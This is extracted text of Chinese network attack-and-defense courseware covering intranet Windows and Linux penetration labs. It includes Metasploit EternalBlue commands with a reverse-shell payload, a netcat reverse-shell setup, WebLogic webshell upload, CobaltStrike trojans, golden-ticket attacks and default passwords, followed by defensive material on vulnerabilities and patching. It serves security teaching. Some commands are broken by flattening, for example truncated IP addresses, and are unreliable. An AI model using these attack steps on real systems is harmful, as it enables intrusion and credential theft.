網(wǎng)絡(luò)攻擊與防護(hù) 課件 第9、10章 內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐、內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1_第1頁(yè)
網(wǎng)絡(luò)攻擊與防護(hù) 課件 第9、10章 內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐、內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1_第2頁(yè)
網(wǎng)絡(luò)攻擊與防護(hù) 課件 第9、10章 內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐、內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1_第3頁(yè)
網(wǎng)絡(luò)攻擊與防護(hù) 課件 第9、10章 內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐、內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1_第4頁(yè)
網(wǎng)絡(luò)攻擊與防護(hù) 課件 第9、10章 內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐、內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1_第5頁(yè)
已閱讀5頁(yè),還剩116頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

內(nèi)網(wǎng)Windows環(huán)境攻擊實(shí)踐前言當(dāng)我們?cè)谶M(jìn)行內(nèi)網(wǎng)滲透中,經(jīng)常會(huì)遇到一些環(huán)境問(wèn)題,比如拿下的目標(biāo)機(jī)和自身的機(jī)器均處于內(nèi)網(wǎng)之中,這時(shí)候想要對(duì)目標(biāo)機(jī)內(nèi)網(wǎng)進(jìn)行滲透就會(huì)遇到一系列的問(wèn)題。比如我如何用掃描器掃對(duì)方的內(nèi)網(wǎng)?我沒(méi)公網(wǎng)IP如何遠(yuǎn)程登錄對(duì)方內(nèi)網(wǎng)主機(jī)?這些問(wèn)題如何解決呢?CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊CobaltStrike工具CobaltStrike是一款滲透測(cè)試工具,CobaltStrike分為客戶端與服務(wù)端,服務(wù)端是單獨(dú)一個(gè),客戶端可以有多個(gè),可用于團(tuán)隊(duì)進(jìn)行分布式協(xié)同操作。CobaltStrike工具結(jié)構(gòu)團(tuán)隊(duì)服務(wù)器創(chuàng)建與連接CobaltStrike用戶接口分為兩部分,接口的頂部是會(huì)話或目標(biāo)的圖形展示,接口的底部展示了每個(gè)與之交互的會(huì)話標(biāo)簽頁(yè)。用戶接口如下圖所示內(nèi)網(wǎng)滲透SystemProfiler是一個(gè)為客戶端攻擊提供的偵察工具,工具啟動(dòng)一個(gè)本地的Web服務(wù)器,并對(duì)訪問(wèn)它的任何應(yīng)用進(jìn)行指紋識(shí)別。SystemProfiler提供一個(gè)它從用戶的瀏覽器里發(fā)現(xiàn)的應(yīng)用和插件的列表,也會(huì)嘗試去發(fā)現(xiàn)代理服務(wù)器背后的用戶的內(nèi)網(wǎng)IP地址。CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊實(shí)驗(yàn)環(huán)境過(guò)程整個(gè)實(shí)驗(yàn)過(guò)程大致如下:1) 攻擊者對(duì)Web網(wǎng)站進(jìn)行信息掃描,掃描結(jié)果顯示7001端口開(kāi)放,7001端口默認(rèn)對(duì)應(yīng)WebLogic服務(wù),存在反序列化遠(yuǎn)程命令執(zhí)行漏洞。2) 使用java反序列化終極測(cè)試工具上傳木馬到Web網(wǎng)站。3) 通過(guò)冰蝎連接Webshell木馬并上傳后門(mén)程序。4) 利用MS14-058(即CVE-2014-4113)將會(huì)話提權(quán)到system權(quán)限。5) 將Web網(wǎng)站作為跳板機(jī)進(jìn)行內(nèi)網(wǎng)滲透。6) 利用CobaltStrike抓取密碼HASH值生成黃金票據(jù),從而獲取域控權(quán)限同時(shí)能夠訪問(wèn)域內(nèi)其他主機(jī)的任何服務(wù)。CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊信息收集途徑公開(kāi)信息收集存活掃描端口掃描服務(wù)識(shí)別掃描系統(tǒng)類型識(shí)別漏洞掃描

針對(duì)口令的掃描

針對(duì)特定安全漏洞的掃描深入獲取系統(tǒng)信息信息收集掃描工具-Nmap被稱為是掃描器之王支持多種掃描技術(shù)目標(biāo)和端口設(shè)定非常靈活掃描過(guò)程根據(jù)網(wǎng)絡(luò)自動(dòng)調(diào)整端口掃描-Nmap掃描目標(biāo)端口:Nmap5Nmap–sS5(SYN方式)Nmap–sT5(TCP方式)掃描目標(biāo)操作系統(tǒng)類型命令:Nmap–O-P05端口掃描-NmapNmap的其他參數(shù):Nmap–sV5(顯示Banner信息)Nmap–p1-505(指定端口范圍)Nmap–v5(輸出更詳細(xì)信息)Nmap–F5(快速模式)Nmap–A5(強(qiáng)化掃描模式)Nmap–oXresult.xml5導(dǎo)出掃描結(jié)果到XML文件中Nmap--iflist顯示所有網(wǎng)絡(luò)接口--packet-trace跟蹤顯示每一個(gè)掃描數(shù)據(jù)包ZenmapZenmap——

圖形界面的nmap常見(jiàn)端口號(hào)21FTP22SSH23Telnet25SMTP53DNS80HTTP110POP3161SNMP443HTTPS513RLogin1433MSSQLServer1521Oracle3306MySQL3389RDP8080ProxyNessus---綜合漏洞掃描綜合漏掃軟件Nessus

Nessus個(gè)人使用可以到官網(wǎng)免費(fèi)申請(qǐng)序列號(hào)

Nessus4.2版開(kāi)始,不再有獨(dú)立的客戶端,而是基于Web來(lái)進(jìn)行管理,一般是這樣的形式:https://[ServerIP]:8834Nessus掃描策略Nessus查看掃描結(jié)果口令安全問(wèn)題口令是很多應(yīng)用系統(tǒng)認(rèn)證用戶采用的最廣泛的認(rèn)證方式,但是口令安全問(wèn)題,給認(rèn)證帶來(lái)了很多安全隱患口令常見(jiàn)安全問(wèn)題有如下表現(xiàn):

弱口令

明文傳輸

默認(rèn)值口令問(wèn)題1——弱口令用戶趨向于選擇容易的口令,甚至空口令用戶會(huì)選擇易于記住的東西做口令 Test、guest、google、iphone等

名字、生日、簡(jiǎn)單數(shù)字等易于選擇該系統(tǒng)的應(yīng)用 NtServer、oracle等多數(shù)用戶的安全意識(shí)薄弱口令問(wèn)題2——明文傳輸使用明文密碼傳送的應(yīng)用: FTP、POP、Telnet、HTTP、SNMP、Socks Mountd、Rlogin、NNTP、NFS、 ICQ、IRC、PcAnywhere、VNC等 MSSQL、Oracle等上述服務(wù)都容易成為攻擊對(duì)象口令問(wèn)題3——默認(rèn)值網(wǎng)絡(luò)設(shè)備 CiscoRouteruser:enablepw:cisco 3Com交換機(jī)user:adminpw:synnet TPLink無(wú)線路由:user:adminpw:adminModem等等數(shù)據(jù)庫(kù) MS-SQL:sa+空口令SNMP Public、Private口令攻擊方式手工猜測(cè)

方法:社會(huì)工程學(xué)、嘗試默認(rèn)口令自動(dòng)猜測(cè)

工具:John、LC、NTscan等竊聽(tīng):登陸、網(wǎng)絡(luò)截獲、鍵盤(pán)監(jiān)聽(tīng)

工具:Dsniff、SnifferPro、IKS等NtScan--破解Windows系統(tǒng)口令將生成的字典文件重命名為NT_pass.dic,覆蓋Ntscan目錄下的原字典文件NtScan--破解Windows系統(tǒng)口令運(yùn)行NtScan,如果目標(biāo)服務(wù)器密碼在字典文件中存在,則會(huì)出現(xiàn)如下掃描結(jié)果:緩沖區(qū)溢出緩沖區(qū)溢出攻擊原理

緩沖區(qū)溢出攻擊利用編寫(xiě)不夠嚴(yán)謹(jǐn)?shù)某绦?,通過(guò)向程序的緩沖區(qū)寫(xiě)入超過(guò)預(yù)定長(zhǎng)度的數(shù)據(jù),造成緩存的溢出,從而破壞程序的堆棧,導(dǎo)致程序執(zhí)行流程的改變。緩沖區(qū)溢出的危害

最大數(shù)量的漏洞類型。

漏洞危害等級(jí)高。國(guó)家漏洞庫(kù)(CNNVD)漏洞統(tǒng)計(jì)緩沖區(qū)溢出基礎(chǔ)-堆棧、指針、寄存器堆棧概念

一段連續(xù)分配的內(nèi)存空間。堆棧特點(diǎn)

后進(jìn)先出。

堆棧生長(zhǎng)方向與內(nèi)存地址方向相反。指針

指針是指向內(nèi)存單元的地址。寄存器

暫存指令、數(shù)據(jù)和位址。 ESP(棧頂)、EBP(棧底)、EIP(返回地址)。34H12H78H56H0108HESP棧頂(AL)(AH)34H12H78H56H0106HESP棧頂緩沖區(qū)溢出簡(jiǎn)單示例程序作用:將用戶輸入的內(nèi)容打印在屏幕上。Buffer.c#include<stdio.h>intmain(){

charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}緩沖區(qū)溢出示例用戶輸入內(nèi)容在8位以內(nèi)時(shí)候,程序正常執(zhí)行用戶輸入內(nèi)容超過(guò)8位以后,程序執(zhí)行產(chǎn)生錯(cuò)誤緩沖區(qū)溢出簡(jiǎn)單示例由于返回地址已經(jīng)被覆蓋,函數(shù)執(zhí)行返回地址時(shí)會(huì)將覆蓋內(nèi)容當(dāng)作返回地址,然后試圖執(zhí)行相應(yīng)地址的指令,從而產(chǎn)生錯(cuò)誤。當(dāng)我們?nèi)枯斎隺時(shí),錯(cuò)誤指令地址為0x616161,0x61是a的ASCII編碼緩沖區(qū)溢出攻擊危害如果可精確控制內(nèi)存跳轉(zhuǎn)地址,就可以執(zhí)行指定代碼,獲得權(quán)限或破壞系統(tǒng)。尋找程序漏洞編制緩沖區(qū)溢出程序精確控制跳轉(zhuǎn)地址執(zhí)行設(shè)定的代碼獲得系統(tǒng)權(quán)限或破壞系統(tǒng)歷史上經(jīng)典的緩沖區(qū)溢出漏洞Rpc溢出SQLUDP溢出暴風(fēng)影音2溢出Serv-U溢出漏洞Ms05039Ms06040Ms08067Ms17010(永恒之藍(lán))…緩沖區(qū)漏洞利用-Metasploit平臺(tái)介紹溢出攻擊平臺(tái)—Metasploit實(shí)例—msf攻擊ms-17010漏洞主機(jī)1.

searchms17_0102.use

exploit/windows/smb/ms17_010_eternalblue//運(yùn)行payload3.

setpayloadwindows/x64/meterpreter/reverse_tcp//指定溢出成功后運(yùn)行的代碼,這里獲取反彈端口的shell4.showoptionsinfo//查看漏洞信息與腳本參數(shù)5.setrhost38//設(shè)定攻擊目標(biāo)IP6.setlhost36//本機(jī)IP7.exploit//開(kāi)始攻擊8.shell//連接溢出成功后打開(kāi)的shell終端內(nèi)網(wǎng)滲透場(chǎng)景在我們進(jìn)行內(nèi)網(wǎng)滲透中,經(jīng)常會(huì)遇到一些環(huán)境問(wèn)題,比如拿下的目標(biāo)機(jī)和自身的機(jī)器均處于內(nèi)網(wǎng)之中,這時(shí)候想要對(duì)目標(biāo)機(jī)內(nèi)網(wǎng)進(jìn)行滲透就會(huì)遇到一系列的問(wèn)題.比如我如何用掃描器掃對(duì)方的內(nèi)網(wǎng)?我沒(méi)公網(wǎng)IP如何遠(yuǎn)程登錄對(duì)方內(nèi)網(wǎng)主機(jī)?…端口轉(zhuǎn)發(fā)端口轉(zhuǎn)發(fā)這個(gè)我們?cè)趦?nèi)網(wǎng)滲透中也是經(jīng)常遇到,可以使用現(xiàn)成的一些工具或者通過(guò)腳本命令進(jìn)行轉(zhuǎn)發(fā)常用的轉(zhuǎn)發(fā)工具:Netcat、Lcx、Htran、FpipeNetcat是大家都很熟悉的一款軟件了,功能十分強(qiáng)大,安全人員必備工具之一。NC使用NC使用:-e參數(shù),例如:我們將一臺(tái)win主機(jī)shell反彈到一臺(tái)linux主機(jī)上,win上執(zhí)行。在linux主機(jī)上監(jiān)聽(tīng)此端口Sock代理Sock代理是一種基于傳輸層的網(wǎng)絡(luò)代理協(xié)議,不同于VPN,Sock代理只能對(duì)使用該代理協(xié)議的程序生效,因此,可以說(shuō)它是一種局部代理,而不是像VPN一樣的全局代理,速度也弱于VPN。但在我們滲透測(cè)試中,需要盡量對(duì)目標(biāo)機(jī)制造出盡可能小的影響,因此,sock代理也經(jīng)常會(huì)被用到。Sock代理場(chǎng)景攻擊端和內(nèi)網(wǎng)主機(jī)處于同一網(wǎng)絡(luò)環(huán)境下,或者攻擊端具有公網(wǎng)IP,因?yàn)樵诜?wù)器端運(yùn)行sock腳本時(shí)會(huì)需要尋址到客戶端。下面拓?fù)淝闆r為攻擊端無(wú)法直接訪問(wèn)內(nèi)網(wǎng)主機(jī):socks5代理(reGeorg+proxifier)reGeorgreGeorg是reDuh的繼承者,利用了會(huì)話層的socks5協(xié)議,效率更高。proxifierProxifier是一款功能非常強(qiáng)大的socks5客戶端,可以讓不支持通過(guò)代理服務(wù)器工作的網(wǎng)絡(luò)程序能通過(guò)HTTPS或SOCKS代理或代理鏈。工具配置工具配置先將reGeorg的對(duì)應(yīng)腳本上傳到服務(wù)器端,直接訪問(wèn)顯示“Georgsays,'Allseemsfine'”,表示腳本運(yùn)行正常工具配置運(yùn)行py程序:

python

reGeorgSocksProxy.py

-p

8888

-u

http:

///test/tunnel.jsp工具配置將proxifier打開(kāi),在ProxyServer中這樣配置工具配置在遠(yuǎn)程桌面程序上右鍵,以Proxifier選擇“ProxySOCKS5”打開(kāi)。ipconfig查詢內(nèi)網(wǎng)機(jī)器的ipCobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊WeblogicScan掃描漏洞漏洞檢測(cè)結(jié)果打開(kāi)終端,輸入命令cd/home/WeblogicScan,切換到WeblogicScan目錄,輸入命令python3WeblogicScan.py07001,掃描結(jié)果顯示存在CVE-2019-2725漏洞。WeblogicScan掃描漏洞反序列化漏洞在攻擊主機(jī)的瀏覽器地址欄中輸入0:7001/_async/AsyncResponseService,測(cè)試漏洞是否存在。利用Java反序列化終極測(cè)試工具上傳木馬使用Java反序列化終極測(cè)試工具上傳木馬到目標(biāo)主機(jī),目標(biāo)服務(wù)器選擇Weblogic,目標(biāo)輸入0:7001/,單擊獲取信息按鈕,回顯目標(biāo)主機(jī)相關(guān)信息。反序列化終極測(cè)試工具利用冰蝎連接木馬單擊Webshell上傳標(biāo)簽,上傳冰蝎木馬文件Webshell上傳CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊利用CobaltStrike獲取Shell會(huì)話介紹CobaltStrike是一款基于java編寫(xiě)的全平臺(tái)多方協(xié)同后滲透攻擊框架。CobaltStrike集成了端口轉(zhuǎn)發(fā)、端口掃描、socket代理、提權(quán)、釣魚(yú)、遠(yuǎn)控木馬等功能。該工具幾乎覆蓋了APT攻擊鏈中所需要用到的各個(gè)技術(shù)環(huán)節(jié)。利用CobaltStrike獲取Shell會(huì)話過(guò)程利用CobaltStrike獲取Shell會(huì)話的過(guò)程一共為5步,分別是:1、啟動(dòng)CobaltStrike2、生成木馬3、上傳木馬4、執(zhí)行木馬5、利用MS14-058提權(quán)CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊域環(huán)境信息收集介紹在拿到一臺(tái)域環(huán)境內(nèi)主機(jī)權(quán)限時(shí),首先要做的是通過(guò)一些內(nèi)置命令獲取域中的基本信息,包括獲取根域信息、收集服務(wù)賬號(hào)、非掃描式獲取主機(jī)名、識(shí)別管理員信息、獲取管理員組、獲取域密碼策略、獲取管理服務(wù)的組和賬號(hào)等。域環(huán)境信息收集過(guò)程域環(huán)境信息收集的具體過(guò)程為:1、查看網(wǎng)卡信息2、查看工作域3、查看域內(nèi)用戶4、查看域內(nèi)用戶5、查看域控制器6、查看域管理員CobaltStrike工具實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會(huì)話域環(huán)境信息收集域主機(jī)攻擊域主機(jī)攻擊介紹在對(duì)域環(huán)境進(jìn)行滲透時(shí),黃金票據(jù)是偽造的票據(jù)授予票據(jù)(TGT),是有效的TGTKerberos票據(jù),因?yàn)樗怯捎騅erberos賬戶(KRBTGT)加密和簽名的。TGT僅用于向域控制器上的KDC服務(wù)證明用戶已被其他域控制器認(rèn)證。TGT被KRBTGT密碼散列加密并且可以被域中的任何KDC服務(wù)解密。一旦攻擊者擁有管理員訪問(wèn)域控制器的權(quán)限,就可以使用Mimikatz來(lái)提取KRBTGT賬戶密碼哈希值。域主機(jī)攻擊流程域主機(jī)攻擊流程分為3步:1、利用CobaltStrike抓取密碼2、安裝后門(mén)3、GoldenTicket攻擊總結(jié)1、掌握nmap掃描器使用2、掌握NTScan掃描器使用3、掌握Metasploit使用4、掌握NC工具使用5、了解利用CobaltStrike獲取Shell會(huì)話的步驟6、了解域環(huán)境信息收集的步驟7、了解域主機(jī)攻擊的步驟內(nèi)網(wǎng)Linux環(huán)境攻擊實(shí)踐1實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用Web網(wǎng)站服務(wù)器提權(quán)實(shí)驗(yàn)的攻擊過(guò)程1) 攻擊者對(duì)Web網(wǎng)站進(jìn)行信息掃描,掃描結(jié)果顯示80端口開(kāi)放,表示存在Web服務(wù)。2) 使用Dirb工具對(duì)Web網(wǎng)站掃描,發(fā)現(xiàn)robots.txt且包含敏感文件UPGRADE.txt,得知網(wǎng)站使用Drupal7的cms。3) 利用msfconsole中drupal_drupalgeddon2模塊對(duì)Web網(wǎng)站攻擊,獲取shell會(huì)話,4) 查看passwd文件,獲取flag4用戶名,利用hydra工具破解ssh服務(wù),flag4的登錄密碼為orange。5) 通過(guò)suid提權(quán),將flag4由www-data權(quán)限提升到root權(quán)限。6) 將Web服務(wù)器作為跳板機(jī)攻擊內(nèi)網(wǎng)Linux主機(jī),使用jadx反編譯serial2.apk文件,發(fā)現(xiàn)Linux1的認(rèn)證信息,7) 使用postman軟件獲得反彈shell會(huì)話,利用backd00r文件提權(quán)到root權(quán)限。8) 利用目錄遍歷漏洞下載ctf.cap握手包文件,破解linux2主機(jī)密碼minion.666。實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用Web網(wǎng)站服務(wù)器提權(quán)信息收集介紹信息收集主要是收集服務(wù)器的配置信息和網(wǎng)站的敏感信息,信息收集的全面性對(duì)于后期的滲透工作成功與否至關(guān)重要。通常使用兩種方式進(jìn)行信息收集: 1、Nmap端口掃描 2、Dirb命令探測(cè)網(wǎng)站結(jié)構(gòu)實(shí)驗(yàn)環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用Web網(wǎng)站服務(wù)器提權(quán)漏洞的定義漏洞(Vulnerability)是計(jì)算機(jī)系統(tǒng)的硬件、軟件、協(xié)議在系統(tǒng)設(shè)計(jì)、具體實(shí)現(xiàn)、系統(tǒng)配置或安全策略上存在的缺陷。1.基于訪問(wèn)控制從訪問(wèn)控制角度講,信息安全漏洞是導(dǎo)致操作系統(tǒng)執(zhí)行的操作和訪問(wèn)控制矩陣所定義的安全策略之間相沖突的所有因素。2.漏洞的成因

技術(shù)角度

經(jīng)濟(jì)角度

應(yīng)用環(huán)境角度

漏洞產(chǎn)生的條件漏洞的發(fā)展1.漏洞數(shù)量根據(jù)CNNVD2007-2016年積累的實(shí)際數(shù)據(jù),對(duì)漏洞的數(shù)量、風(fēng)險(xiǎn)、類型、時(shí)間等因素進(jìn)行分析,并總結(jié)漏洞發(fā)展的特點(diǎn)與未來(lái)趨勢(shì),從統(tǒng)計(jì)圖中可以看到,漏洞一直處于不斷上升的趨勢(shì)中。漏洞的發(fā)展2.漏洞產(chǎn)品分布隨著時(shí)間的推移,操作系統(tǒng)、Web瀏覽器和應(yīng)用程序的漏洞在所有信息技術(shù)產(chǎn)品漏洞中所占的比重不斷變化。漏洞的發(fā)展3.漏洞廠商分布序號(hào)廠商名稱漏洞數(shù)量所占比例1Apple6177.96%2Microsoft5356.90%3Cisco4956.38%4Adobe4836.23%5Oracle4776.15%6IBM3154.06%7Google2893.73%8Mozilla1882.42%9HP881.13%10Linux791.02%2015年各大廠商新增安全漏洞統(tǒng)計(jì)表漏洞的發(fā)展4.漏洞類型分布序號(hào)漏洞類型漏洞數(shù)量所占比例1緩沖區(qū)溢出108814.03%2跨站腳本81710.54%3權(quán)限許可和訪問(wèn)控制81210.47%4信息泄露7129.18%5輸入驗(yàn)證5316.85%6資源管理錯(cuò)誤3955.09%7代碼注入2713.49%8SQL注入2683.46%9跨站請(qǐng)求偽造2673.44%10路徑遍歷1632.10%11數(shù)值錯(cuò)誤1511.95%12加密問(wèn)題1041.34%13信任管理680.88%14授權(quán)問(wèn)題520.67%15操作系統(tǒng)命令注入510.66%16競(jìng)爭(zhēng)條件510.66%17后置鏈接230.30%18格式化字符串50.06%19緩沖區(qū)溢出108814.03%20跨站腳本81710.54%2015年漏洞類型統(tǒng)計(jì)表漏洞的發(fā)展5.漏洞危害級(jí)別根據(jù)漏洞的影響范圍、利用方式、攻擊后果等情況,將漏洞分為四個(gè)嚴(yán)重等級(jí),即危急、高危、中危和低危級(jí)別。漏洞的發(fā)展6.漏洞利用漏洞利用復(fù)雜性是確定漏洞威脅程度所需考慮的重要因素,可將漏洞利用復(fù)雜性分為三個(gè)級(jí)別:高、中、低。漏洞利用復(fù)雜度越高表明漏洞越難以利用,低復(fù)雜性漏洞表明風(fēng)險(xiǎn)更大。漏洞的發(fā)展7.漏洞修復(fù)2010-2016年漏洞修復(fù)率呈現(xiàn)出整體上升的趨勢(shì)。這一趨勢(shì)表明IT廠商整體的安全意識(shí)不斷增強(qiáng),在漏洞的響應(yīng)速度上有明顯進(jìn)步,尤其是在產(chǎn)品中存在嚴(yán)重漏洞時(shí),各廠商都積極采取各種措施來(lái)避免由于自己產(chǎn)品的漏洞而導(dǎo)致大規(guī)模攻擊。漏洞的發(fā)展8.發(fā)展趨勢(shì)傳統(tǒng)廠商漏洞數(shù)量居高不下

數(shù)據(jù)庫(kù)產(chǎn)品漏洞數(shù)量有所減少

信息安全產(chǎn)品漏洞頻繁出現(xiàn)

大規(guī)模信息泄露事件不斷發(fā)生

互聯(lián)網(wǎng)金融行業(yè)漏洞集中爆發(fā)漏洞管理組織機(jī)構(gòu)漏洞發(fā)現(xiàn)后,需要及時(shí)進(jìn)行通報(bào)并修補(bǔ),這樣才能將損失降低到最低。漏洞從發(fā)現(xiàn)、通報(bào)和修補(bǔ)過(guò)程中涉及到漏洞挖掘分析人員、漏洞驗(yàn)證人員、漏洞管理機(jī)構(gòu)、漏洞通報(bào)機(jī)制、漏洞補(bǔ)丁分發(fā)機(jī)制和漏洞修補(bǔ)方法,從漏洞發(fā)現(xiàn)到最終漏洞的修補(bǔ)涉及各種類型的人員和組織結(jié)構(gòu)。政府類漏洞管理機(jī)構(gòu)中國(guó)國(guó)家信息安全漏洞庫(kù)(CNNVD)企業(yè)漏洞研究機(jī)構(gòu)

360補(bǔ)天漏洞響應(yīng)平臺(tái)等

軟件廠商

軟件用戶漏洞管理組織機(jī)構(gòu)各類機(jī)構(gòu)的漏洞管理策略漏洞管理標(biāo)準(zhǔn)規(guī)范信息安全漏洞相關(guān)準(zhǔn)則和規(guī)范研究在管理漏洞方面起到了重要作用,可為國(guó)家在信息安全漏洞的管理措施制定、管理機(jī)制運(yùn)行、管理部門(mén)協(xié)作等方面提供參考或依據(jù),為行政管理的重要輔助手段之一。同時(shí),相關(guān)準(zhǔn)則和規(guī)范也是信息安全測(cè)評(píng)和風(fēng)險(xiǎn)評(píng)估工作開(kāi)展的基礎(chǔ),為漏洞分析工作提供系統(tǒng)的、全面的指導(dǎo)和建議。漏洞管理標(biāo)準(zhǔn)規(guī)范漏洞標(biāo)識(shí)管理規(guī)范漏洞標(biāo)識(shí)方面的規(guī)范是為信息安全漏洞在不同對(duì)象之間的傳遞和表達(dá)提供一致的方法。漏洞補(bǔ)丁管理規(guī)范漏洞補(bǔ)丁管理是漏洞管理的重要部分也是關(guān)鍵的步驟,安裝補(bǔ)丁是一個(gè)基于時(shí)間順序組織起來(lái)的由若干階段組成的過(guò)程。針對(duì)這一關(guān)鍵環(huán)節(jié),眾多廠商和團(tuán)體提出了不同的補(bǔ)丁管理過(guò)程,其中具代表性的有微軟的補(bǔ)丁管理過(guò)程、XFOCUS的補(bǔ)丁管理過(guò)程和Solaris操作系統(tǒng)中的補(bǔ)丁管理過(guò)程等。補(bǔ)丁的基本描述補(bǔ)丁是針對(duì)軟件系統(tǒng)(如操作系統(tǒng)和各種應(yīng)用軟件)所存在的問(wèn)題而發(fā)布的解決問(wèn)題的小程序。補(bǔ)丁的重要性 1、補(bǔ)丁可以有效阻止非法入侵者 2、補(bǔ)丁可以減少惡意代碼入侵的機(jī)會(huì) 3、補(bǔ)丁可以有效減少不兼容問(wèn)題補(bǔ)丁的基本描述補(bǔ)丁主要有三種類型:缺陷型補(bǔ)丁、增強(qiáng)型補(bǔ)丁和漢化型補(bǔ)丁。缺陷型補(bǔ)丁缺陷型補(bǔ)丁可以修補(bǔ)現(xiàn)有軟件版本中存在的某些缺陷,這樣就能快速高效地解決軟件自身的一些問(wèn)題。增強(qiáng)型補(bǔ)丁此類補(bǔ)丁的主要作用是增強(qiáng)軟件的某些功能。一些軟件在設(shè)計(jì)開(kāi)發(fā)時(shí),有些功能兼容性差,有些功能存在安全隱患。通過(guò)增強(qiáng)型補(bǔ)丁可以修復(fù)軟件的某些功能,這樣它的功能會(huì)更加完善,從而使軟件滿足更多用戶的需求。漢化型補(bǔ)丁此類補(bǔ)丁主要用來(lái)將非漢語(yǔ)軟件界面中文化。當(dāng)某些軟件的界面是英文,需要將其漢化的時(shí)候,可以使用漢化型補(bǔ)丁來(lái)解決這個(gè)問(wèn)題。補(bǔ)丁的基本描述補(bǔ)丁的屬性

補(bǔ)丁基本信息

廠商信息

第三方信息

對(duì)應(yīng)漏洞信息補(bǔ)丁的修復(fù)方式1.保護(hù)內(nèi)存安全由不恰當(dāng)?shù)膬?nèi)存操作引起的內(nèi)存損壞相關(guān)的漏洞是很危險(xiǎn)的安全漏洞。這類漏洞能破壞內(nèi)存的數(shù)據(jù)結(jié)構(gòu),從而使程序運(yùn)行異?;蛘咧苯油顺?;它甚至?xí)鹁彌_區(qū)溢出,導(dǎo)致惡意入侵者控制重要的內(nèi)存數(shù)據(jù),獲得使用系統(tǒng)的高級(jí)權(quán)限。因此,保護(hù)內(nèi)存安全刻不容緩。2.驗(yàn)證惡意輸入補(bǔ)丁可以通過(guò)驗(yàn)證輸入是否為惡意輸入來(lái)提高軟件的安全性,因?yàn)檩斎胧鞘芡獠靠刂频?,入侵者往往想方設(shè)法構(gòu)造惡意輸入而巧妙地觸發(fā)漏洞。因此,驗(yàn)證惡意輸入補(bǔ)丁可以針對(duì)軟件的所有輸入,包括顯式和隱式輸入源、命令行參數(shù)、數(shù)據(jù)庫(kù)數(shù)據(jù)、網(wǎng)絡(luò)服務(wù)、配置文件、臨時(shí)文件、環(huán)境變量、注冊(cè)表值和系統(tǒng)性能參數(shù)等進(jìn)行語(yǔ)法和語(yǔ)義的多層次驗(yàn)證,并在使用中標(biāo)識(shí)和隔離可信數(shù)據(jù)和不可信數(shù)據(jù)。補(bǔ)丁的修復(fù)方式3.監(jiān)控錯(cuò)誤與異常一般情況下,程序員沒(méi)有完全考慮錯(cuò)誤條件和異常情況,而是更多地考慮期望的正常情況,這種忽略使得入侵者可以沿著各種易被忽略的旁路來(lái)實(shí)現(xiàn)攻擊。因此,安全補(bǔ)丁需要對(duì)易被忽略的旁路進(jìn)行監(jiān)控。4.補(bǔ)丁修復(fù)面臨的問(wèn)題需要補(bǔ)丁修復(fù)的漏洞非常多。補(bǔ)丁的測(cè)試工作繁瑣。補(bǔ)丁的獲取途徑?jīng)]有標(biāo)準(zhǔn),存在安全隱患。有些補(bǔ)丁在安裝部署后需要重啟系統(tǒng)。漏洞的安全教育和防范意識(shí)1、安全原則

最小特權(quán)原則

保持簡(jiǎn)單原則

輸入皆有害的原則

減小受攻擊面原則2、持續(xù)教育開(kāi)發(fā)過(guò)程中的規(guī)范為改變無(wú)休止安裝補(bǔ)丁的封堵防御策略現(xiàn)狀,降低漏洞消控成本,近年來(lái)軟件產(chǎn)業(yè)界出現(xiàn)了安全軟件開(kāi)發(fā)生命周期(SecuritySoftwareDevelopmentLifecycle,SSDL)的概念。它并不是完全摒棄傳統(tǒng)的軟件開(kāi)發(fā)步驟,創(chuàng)建一個(gè)新的開(kāi)發(fā)過(guò)程,而是基于傳統(tǒng)的軟件生命周期,通過(guò)在軟件開(kāi)發(fā)的不同階段引入最佳安全實(shí)踐來(lái)保證軟件安全。1.安全規(guī)范在軟件開(kāi)發(fā)項(xiàng)目的起始階段,就必須考慮到安全規(guī)范,這包括安全原則、規(guī)則及規(guī)章等。2.安全需求以文檔的形式記錄安全需求是很重要的。開(kāi)發(fā)過(guò)程中的規(guī)范3.設(shè)計(jì)安全性軟件架構(gòu)的安全性分析過(guò)程一般包含三個(gè)步驟:第一步是架構(gòu)師根據(jù)軟件需求進(jìn)行架構(gòu)分析;第二步是安全分析師在架構(gòu)師的幫助下對(duì)架構(gòu)進(jìn)行建